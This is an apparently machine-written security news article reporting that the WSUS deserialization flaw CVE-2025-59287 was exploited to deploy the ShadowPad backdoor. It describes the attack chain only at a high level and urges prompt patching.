Ethical Hacking News
A new vulnerability in Microsoft's Windows Server Update Services (WSUS) has been exploited by threat actors to distribute the ShadowPad malware, a modular backdoor widely used by Chinese state-sponsored hacking groups. This article explores the intricacies of the ShadowPad malware and its connection to the CVE-2025-59287 vulnerability in WSUS, highlighting the importance of keeping software up-to-date and applying security patches in a timely manner.
A security flaw in Microsoft's Windows Server Update Services (WSUS) was recently patched but has been exploited by threat actors.The CVE-2025-59287 vulnerability allows for remote code execution with system privileges, increasing the potential impact of the attack.ShadowPad malware, a modular backdoor widely used by Chinese state-sponsored hacking groups, was distributed using the exploit.The attackers used ShadowPad for reconnaissance, data exfiltration, and command and control (C2) activities.The importance of keeping software up-to-date and applying security patches in a timely manner is highlighted.
The cybersecurity landscape has witnessed an influx of vulnerabilities and malware attacks in recent times, leaving organizations to grapple with the ever-evolving threat landscape. In this context, a security flaw in Microsoft's Windows Server Update Services (WSUS) that was recently patched has been exploited by threat actors to distribute malware known as ShadowPad. This article delves into the intricacies of the ShadowPad malware and its connection to the CVE-2025-59287 vulnerability in WSUS.
According to AhnLab Security Intelligence Center, a South Korean cybersecurity company, the attackers targeted Windows Servers with WSUS enabled, exploiting the CVE-2025-59287 vulnerability for initial access. This critical deserialization flaw in WSUS could be exploited to achieve remote code execution with system privileges, significantly increasing the potential impact of the attack.
Once the attackers gained initial access, they utilized the PowerCat, an open-source PowerShell-based Netcat utility, to obtain a system shell (CMD). Subsequently, they downloaded and installed ShadowPad using certutil and curl. The malware was found to be launched via DLL side-loading, leveraging a legitimate binary ("ETDCtrlHelper.exe") to execute a DLL payload ("ETDApix.dll"), which serves as a memory-resident loader to execute the backdoor.
ShadowPad, assessed to be a successor to PlugX, is a modular backdoor widely used by Chinese state-sponsored hacking groups. It first emerged in 2015 and has since been observed in various attacks targeting organizations worldwide. In an analysis published in August 2021, SentinelOne referred to it as a "masterpiece of privately sold malware in Chinese espionage."
The attackers utilized the ShadowPad malware for a variety of malicious purposes, including reconnaissance, data exfiltration, and command and control (C2) activities. The malware was also found to contain anti-detection and persistence techniques, making it difficult for security software to detect and remove.
The CVE-2025-59287 vulnerability has been under heavy exploitation since its patching by Microsoft last month. Threat actors have used the vulnerability to obtain initial access to publicly exposed WSUS instances, conduct reconnaissance, and even drop legitimate tools like Velociraptor. This highlights the importance of keeping software up-to-date and applying security patches in a timely manner.
In conclusion, the ShadowPad malware serves as a prime example of the consequences of neglecting software updates and patching vulnerabilities. The critical deserialization flaw in WSUS that was recently patched has been exploited by threat actors to distribute this malicious malware. As cybersecurity professionals, it is essential to remain vigilant and proactive in addressing emerging threats and vulnerabilities.
Related Information:
https://www.ethicalhackingnews.com/articles/The-ShadowPad-Malware-Menace-A-Critical-Vulnerability-in-Microsofts-WSUS-Exposed-ehn.shtml
https://thehackernews.com/2025/11/shadowpad-malware-actively-exploits.html
https://cyberpress.org/shadowpad-malware/
https://nvd.nist.gov/vuln/detail/CVE-2025-59287
https://www.cvedetails.com/cve/CVE-2025-59287/
Published: Mon Nov 24 02:37:35 2025 by llama3.2 3B Q4_K_M
